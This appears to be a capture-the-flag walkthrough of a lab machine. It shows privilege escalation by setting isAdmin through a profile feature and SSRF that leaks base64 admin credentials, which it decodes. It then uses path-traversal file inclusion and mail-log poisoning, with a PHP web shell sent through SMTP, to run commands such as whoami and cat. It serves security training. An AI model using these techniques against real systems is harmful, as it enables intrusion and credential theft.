Enumeration
Port Scans
nmap - TCP All ports scan
Port | State | Service | Version |
22/tcp | open | ssh | OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 |
25/tcp | open | smtp | Postfix smtpd |
110/tcp | open | pop3 | Dovecot pop3d |
143/tcp | open | imap | Dovecot imapd |
993/tcp | open | imap | Dovecot imapd |
995/tcp | open | pop3 | Dovecot pop3d |
4000/tcp | open | http | Node.js |
50000/tcp | open | http | Apache httpd 2.4.41 |
HTTP
Navigating to the website located on port 4000 shows a login portal with the suggested credentials of guest / guest.
Logging in with guest / guest. We see some kind of social website.
First Flag
Click on the view profile we see that we are able to Recommend an Activity to guest for the user we are currently logged in as.
If we set the isAdmin property to be true and click on Recommend Activity button.
We can see that the isAdmin property in the user profile has been updated. And also we can see some other menus shown in the top right hand corner.
Clicking on the API link brings us to the following page.
Highlight and copy the second link shown below.
Click on the Settings link.
Paste the link into the Update Banner Imager URL field and click on the Update Banner Image button.
http://127.0.0.1:5000/getAllAdmins101099991
Once the URL has been retrieved we can see some base64 text shown. Copy all of the base64 text.
We can then use the below command to decode the base64 text.
echo 'eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2aWV3QXBwUGFzc3dvcmQiOiJhZG1pbkAhISEiLCJTeXNNb25BcHBVc2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0=' | base64 -d
If we then navigate to the URL http://10.10.146.32:50000/login.php we can then login with the credentials administrator / S$9$qk6d#**LQU and capture the first flag.
Second Flag
Review the BurpSuite history if you haven’t been proxying through BurpSuite the whole time you probably should do.
Select the Proxy tab, then select HTTP history then click below HTTP history where is says Filter.
Ensure the highlighted settings are all selected then click on Apply.
You should see in the history the GET request to profile.php?img=profile.png.
Right click on this request and click Send to Intruder.
Click on the Clear button on the right hand side in the middle.
Highlight profile.png in the request. Then click on the Add button.
The text profile.png should now be changed to §profile.png§ indicating that it has been selected as a payload position.
Click on Payloads then select the Fuzzing - path traversal payload from the list.
Once the payloads in the red box below are showing click on the Start Attack box.
Click on the Length column header to sort the requests by descending length. If you then click on the highlighted request then click on the Response. You should see the hosts file displaying indicating that we have found a Local File Inclusion vulnerability (LFI).
Right click on this request and select Send to Repeater.
Now we need to turn this LFI into a Remote Code Execution (RCE) vulnerability. The usual way to do this is by log poisoning most commonly done via a web log file either Apache or NGINX. However these don’t seem to be available. So we will try the SSH log file.
In BurpSuite repeater modify the request as below. Then click Send.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log
The response indicates that the log file may in fact be blank so we can use SMTP to put a reverse shell into the log file.
Connect to the SMTP service using telnet. And run the below commands to attempt to send an email. It will fail that is OK and to be expected.
telnet 10.10.66.126 25
HELO hulkgosmash
MAIL FROM: hulkgosmash@mail.com
RCPT TO: <?php system($_GET['cmd']); ?>
Back in BurpSuite Repeater modify the request as below and click Send. You should see www-data in the bottom of the log file indicating that we have RCE.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log&cmd=whoami
Modify the command as below to view the files in the web directory.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log&cmd=ls 
Modify the command again to view the contents of the file and subsequently the flag.
GET /profile.php?img=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fvar%2flog%2fmail.log&cmd=cat+505eb0fb8a9f32853b4d955e1f9123ea.txt